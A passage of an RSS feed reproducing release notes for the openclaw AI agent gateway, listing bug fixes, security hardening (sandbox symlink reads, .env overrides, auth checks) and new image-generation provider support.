<li>Discord: make auto-thread parent transcript inheritance opt-in via <code>channels.discord.thread.inheritParent</code>, keeping newly created Discord thread sessions isolated by default while preserving explicit inheritance for configured accounts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306107368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69907" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69907/hovercard" href="https://github.com/openclaw/openclaw/issues/69907">#69907</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306774023" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69986" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69986/hovercard" href="https://github.com/openclaw/openclaw/pull/69986">#69986</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Blahdude/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Blahdude">@Blahdude</a>.</li>
<li>Browser/Chrome MCP: reset cached existing-session control sessions when a <code>navigate_page</code> call times out, so one stuck navigation no longer poisons the browser profile until a gateway restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303163323" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69733" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69733/hovercard" href="https://github.com/openclaw/openclaw/pull/69733">#69733</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ayeshakhalid192007-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ayeshakhalid192007-dev">@ayeshakhalid192007-dev</a>.</li>
<li>Browser/Chrome MCP: propagate click timeouts and abort signals to existing-session actions so a stuck click fails fast and reconnects instead of poisoning the browser tool until gateway restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4229167771" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63524" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63524/hovercard" href="https://github.com/openclaw/openclaw/pull/63524">#63524</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dongseok0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dongseok0">@dongseok0</a>.</li>
<li>Amazon Bedrock/prompt caching: resolve opaque application inference profile targets before injecting Bedrock cache points, require every routed target to support explicit cache points, and retry transient profile lookups instead of caching a false negative for the rest of the process. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306412888" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69953" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69953/hovercard" href="https://github.com/openclaw/openclaw/pull/69953">#69953</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anirudhmarc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anirudhmarc">@anirudhmarc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/channel health: base stale-socket recovery on provider-proven transport activity instead of inbound app-event freshness, preventing quiet Slack, Discord, Telegram, Matrix, and local-style channels from being restarted solely because no user traffic arrived. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4305108990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69833" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69833/hovercard" href="https://github.com/openclaw/openclaw/pull/69833">#69833</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bek91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bek91">@bek91</a>.</li>
<li>OpenCode Go: canonicalize stale bundled <code>opencode-go</code> base URLs from <code>/go</code> or <code>/go/v1</code> to <code>/zen/go</code> or <code>/zen/go/v1</code>, so older generated model metadata stops hitting the 404 HTML endpoint. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306062694" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69898" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69898/hovercard" href="https://github.com/openclaw/openclaw/issues/69898">#69898</a>)</li>
<li>CLI/channels: honor <code>channels.&lt;id&gt;.enabled=false</code> as a hard read-only presence opt-out, so env vars, manifest env vars, or stale persisted auth state no longer make disabled channel plugins appear in status, doctor, or setup-only discovery.</li>
<li>Channels/preview streaming: centralize draft-preview finalization so Slack, Discord, Mattermost, and Matrix no longer flush temporary preview messages for media/error finals, and preserve first-reply threading for normal fallback delivery.</li>
<li>Discord: keep slash command follow-up chunks ephemeral when the command is configured for ephemeral replies, so long <code>/status</code> output no longer leaks fallback model or runtime details into the public channel. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4305808727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69869" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69869/hovercard" href="https://github.com/openclaw/openclaw/pull/69869">#69869</a>) thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>Gateway/session history: re-check current auth and <code>chat.history</code> scope before later SSE keepalives and transcript updates, so active session-history streams close before delivering post-revocation events.</li>
<li>Plugins/discovery: reject package plugin source entries that escape the package directory before explicit runtime entries or inferred built JavaScript peers can be used. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4305801034" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69868" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69868/hovercard" href="https://github.com/openclaw/openclaw/pull/69868">#69868</a>) thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>CLI/channels: resolve channel presence through a shared policy that keeps ambient env vars and stale persisted auth from surfacing disabled bundled plugins in status, doctor, security audit, and cron delivery validation unless the channel or plugin is effectively enabled or explicitly configured. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4305762527" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69862" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69862/hovercard" href="https://github.com/openclaw/openclaw/pull/69862">#69862</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>Doctor/plugins: hydrate legacy partial interactive handler state before plugin reload clears dedupe caches, so <code>openclaw doctor</code> and post-update doctor runs no longer crash with <code>Cannot read properties of undefined (reading 'clear')</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308540363" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70135" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70135/hovercard" href="https://github.com/openclaw/openclaw/pull/70135">#70135</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ngutman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ngutman">@ngutman</a>.</li>
<li>Control UI/config: preserve intentionally empty raw config snapshots when clearing pending updates so reset restores the original bytes instead of synthesizing JSON for blank config files. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283714098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68178" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68178/hovercard" href="https://github.com/openclaw/openclaw/pull/68178">#68178</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>memory-core/dreaming: surface a <code>Dreaming status: blocked</code> line in <code>openclaw memory status</code> when dreaming is enabled but the heartbeat that drives the managed cron is not firing for the default agent, and add a Troubleshooting section to the dreaming docs covering the two common causes (per-agent <code>heartbeat</code> blocks excluding <code>main</code>, and <code>heartbeat.every</code> set to <code>0</code>/empty/invalid), so the silent failure described in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4305386663" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69843" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69843/hovercard" href="https://github.com/openclaw/openclaw/issues/69843">#69843</a> becomes legible on the status surface.</li>
<li>Cron/run-log: report generic <code>message</code> tool sends under the resolved delivery channel when they match the cron target, while preserving account-specific mismatch checks for delivery traces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306314180" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69940/hovercard" href="https://github.com/openclaw/openclaw/pull/69940">#69940</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davehappyminion/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davehappyminion">@davehappyminion</a>.</li>
<li>Doctor/channels: merge configured-channel doctor hooks across read-only, loaded, setup, and runtime plugin discovery so partial adapters no longer hide runtime-only compatibility repair or allowlist warnings, preserve disabled-channel opt-outs, and ignore malformed hook values before they can mask valid fallbacks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306168321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69919" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69919/hovercard" href="https://github.com/openclaw/openclaw/pull/69919">#69919</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>Models/CLI: show bundled provider-owned static catalog rows in <code>models list --all</code> before auth is configured, including Kimi K2.6 rows for Moonshot, OpenRouter, and Vercel AI Gateway, while keeping local-only and workspace plugin catalog paths isolated. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306116301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69909" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69909/hovercard" href="https://github.com/openclaw/openclaw/pull/69909">#69909</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Models/CLI: clarify that <code>models list --provider</code> expects provider ids and reject display labels before loading model discovery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313896743" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70504" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70504/hovercard" href="https://github.com/openclaw/openclaw/pull/70504">#70504</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Configure: skip generic CLI startup bootstrap for <code>openclaw configure</code> and bound hint-only gateway probes so the onboarding TUI reaches its first prompt faster when the Gateway is unavailable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306762689" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69984" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69984/hovercard" href="https://github.com/openclaw/openclaw/pull/69984">#69984</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Agents/harness: surface selected plugin harness failures directly instead of replaying the same turn through embedded PI, preventing misleading secondary PI auth errors and avoiding duplicate side effects.</li>
<li>OpenAI Codex: add a ChatGPT device-code auth option beside browser OAuth, so headless or callback-hostile setups can sign in without relying on the localhost browser callback. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299999953" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69557" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69557/hovercard" href="https://github.com/openclaw/openclaw/pull/69557">#69557</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI sessions: keep provider-owned CLI sessions through implicit daily expiry while preserving explicit reset behavior, and retain Claude CLI binding metadata across gateway agent requests. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308114215" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70106" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70106/hovercard" href="https://github.com/openclaw/openclaw/pull/70106">#70106</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>fix(config): accept truncateAfterCompaction (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286642542" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68395" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68395/hovercard" href="https://github.com/openclaw/openclaw/pull/68395">#68395</a>). Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MonkeyLeeT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MonkeyLeeT">@MonkeyLeeT</a></li>
<li>CLI/Claude: keep Claude CLI session bindings stable across OAuth access-token refreshes, so gateway restarts continue the same Claude conversation instead of minting a fresh one. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308514732" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70132" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70132/hovercard" href="https://github.com/openclaw/openclaw/pull/70132">#70132</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>QQBot: add <code>INTERACTION</code> intent (<code>1 &lt;&lt; 26</code>) to the gateway constants and include it in the <code>FULL_INTENTS</code> mask so interaction events are received. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308641703" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70143" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70143/hovercard" href="https://github.com/openclaw/openclaw/pull/70143">#70143</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cxyhhhhh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cxyhhhhh">@cxyhhhhh</a>.</li>
<li>Gateway/restart: preserve one-shot continuation instructions across gateway restarts so agents can resume and reply back to the original chat after reboot. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4228107961" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63406" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63406/hovercard" href="https://github.com/openclaw/openclaw/pull/63406">#63406</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</li>
<li>Gateway/restart: write restart sentinel files atomically so interrupted writes cannot leave a truncated sentinel behind. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309884733" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70225" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70225/hovercard" href="https://github.com/openclaw/openclaw/pull/70225">#70225</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Pairing: remove stale pending requests for a device when that paired device is deleted, so an old repair approval cannot recreate the removed device from leftover state.</li>
<li>Security/dotenv: block workspace <code>.env</code> overrides for Matrix, Mattermost, IRC, and Synology endpoint settings so cloned workspaces cannot redirect bundled connector traffic through local endpoint config. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310177249" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70240" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70240/hovercard" href="https://github.com/openclaw/openclaw/pull/70240">#70240</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Telegram: require the same <code>/models</code> authorization for group model-picker callbacks, so unauthorized participants can no longer browse or change the session model through inline buttons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310137448" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70235" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70235/hovercard" href="https://github.com/openclaw/openclaw/pull/70235">#70235</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Agents/Pi: keep the filtered tool-name allowlist active for embedded OpenAI/OpenAI Codex GPT-5 runs and compaction sessions, so bundled and client tools still execute after the Pi <code>0.68.1</code> session-tool allowlist change instead of stopping at plan-only replies with no tool call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310697193" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70281" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70281/hovercard" href="https://github.com/openclaw/openclaw/pull/70281">#70281</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>Agents/Pi: honor explicit <code>strict-agentic</code> execution contracts for incomplete-turn retry guards across providers, so manually opted-in local or compatible models get the same retry behavior without relying on OpenAI model inference. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264201480" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66750" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66750/hovercard" href="https://github.com/openclaw/openclaw/pull/66750">#66750</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ziomancer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ziomancer">@ziomancer</a>.</li>
<li>OpenShell/sandbox: pin verified file reads to an already-opened descriptor, walk the ancestor chain for symlinked parents on platforms without fd-path readlink, and re-check file identity so parent symlink swaps cannot redirect in-sandbox reads to host files outside the allowed mount root. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304322042" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69798" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69798/hovercard" href="https://github.com/openclaw/openclaw/pull/69798">#69798</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Gateway/Control UI: require authenticated Control UI read access before serving <code>/__openclaw/control-ui-config.json</code> when <code>gateway.auth</code> is enabled, so unauthenticated callers can no longer read bootstrap metadata. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310214037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70247" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70247/hovercard" href="https://github.com/openclaw/openclaw/pull/70247">#70247</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Gateway/restart: default session-scoped restart sentinels to a one-shot agent continuation, so chat-initiated Gateway restarts acknowledge successful boot automatically. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310542377" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70269" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70269/hovercard" href="https://github.com/openclaw/openclaw/pull/70269">#70269</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Build/npm publish: fail postpublish verification when root <code>dist/*</code> files import bundled plugin runtime dependencies without mirroring them in the root package manifest, so Slack-style plugin deps cannot silently ship on the wrong module-resolution path again. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198765077" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60112" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60112/hovercard" href="https://github.com/openclaw/openclaw/pull/60112">#60112</a>) thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/medns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/medns">@medns</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.23-beta.4]]></title>
<description><![CDATA[Changes

Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so openai/gpt-image-2 works without an OPENAI_API_KEY. Fixes #70703.
Providers/OpenRouter: add image generation and reference-image editing through image_generate, so OpenRouter image models work with...]]></description>
<link>https://tsecurity.de/de/3460953/downloads/openclaw-2026423-beta4/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3460953/downloads/openclaw-2026423-beta4/</guid>
<pubDate>Fri, 24 Apr 2026 12:30:33 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Changes</h3>
<ul>
<li>Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so <code>openai/gpt-image-2</code> works without an <code>OPENAI_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317685103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70703" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70703/hovercard" href="https://github.com/openclaw/openclaw/issues/70703">#70703</a>.</li>
<li>Providers/OpenRouter: add image generation and reference-image editing through <code>image_generate</code>, so OpenRouter image models work with <code>OPENROUTER_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4142164318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55066" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55066/hovercard" href="https://github.com/openclaw/openclaw/issues/55066">#55066</a> via <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4275765906" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67668" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67668/hovercard" href="https://github.com/openclaw/openclaw/pull/67668">#67668</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/notamicrodose/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/notamicrodose">@notamicrodose</a>.</li>
<li>Image generation: let agents request provider-supported quality and output format hints, and pass OpenAI-specific background, moderation, compression, and user hints through the <code>image_generate</code> tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313875031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70503" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70503/hovercard" href="https://github.com/openclaw/openclaw/pull/70503">#70503</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>.</li>
<li>Agents/subagents: add optional forked context for native <code>sessions_spawn</code> runs so agents can let a child inherit the requester transcript when needed, while keeping clean isolated sessions as the default; includes prompt guidance, context-engine hook metadata, docs, and QA coverage.</li>
<li>Agents/tools: add optional per-call <code>timeoutMs</code> support for image, video, music, and TTS generation tools so agents can extend provider request timeouts only when a specific generation needs it.</li>
<li>Memory/local embeddings: add configurable <code>memorySearch.local.contextSize</code> with a 4096 default so local embedding contexts can be tuned for constrained hosts without patching the memory host. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314612454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70544" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70544/hovercard" href="https://github.com/openclaw/openclaw/pull/70544">#70544</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aalekh-sarvam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aalekh-sarvam">@aalekh-sarvam</a>.</li>
<li>Dependencies/Pi: update bundled Pi packages to <code>0.70.0</code>, use Pi's upstream <code>gpt-5.5</code> catalog metadata for OpenAI and OpenAI Codex, and keep only local <code>gpt-5.5-pro</code> forward-compat handling.</li>
<li>Codex harness: add structured debug logging for embedded harness selection decisions so <code>/status</code> stays simple while gateway logs explain auto-selection and Pi fallback reasons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318523130" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70760" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70760/hovercard" href="https://github.com/openclaw/openclaw/pull/70760">#70760</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Codex harness: route native <code>request_user_input</code> prompts back to the originating chat, preserve queued follow-up answers, and honor newer app-server command approval amendment decisions.</li>
<li>Codex harness/context-engine: redact context-engine assembly failures before logging, so fallback warnings do not serialize raw error objects. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319234861" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70809" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70809/hovercard" href="https://github.com/openclaw/openclaw/pull/70809">#70809</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>WhatsApp/onboarding: keep first-run setup entry loading off the Baileys runtime dependency path, so packaged QuickStart installs can show WhatsApp setup before runtime deps are staged. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320441218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70932" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70932/hovercard" href="https://github.com/openclaw/openclaw/issues/70932">#70932</a>.</li>
<li>Block streaming: suppress final assembled text after partial block-delivery aborts when the already-sent text chunks exactly cover the final reply, preventing duplicate replies without dropping unrelated short messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320362931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70921/hovercard" href="https://github.com/openclaw/openclaw/issues/70921">#70921</a>.</li>
<li>Codex harness/Windows: resolve npm-installed <code>codex.cmd</code> shims through PATHEXT before starting the native app-server, so <code>codex/*</code> models work without a manual <code>.exe</code> shim. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320274139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70913" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70913/hovercard" href="https://github.com/openclaw/openclaw/issues/70913">#70913</a>.</li>
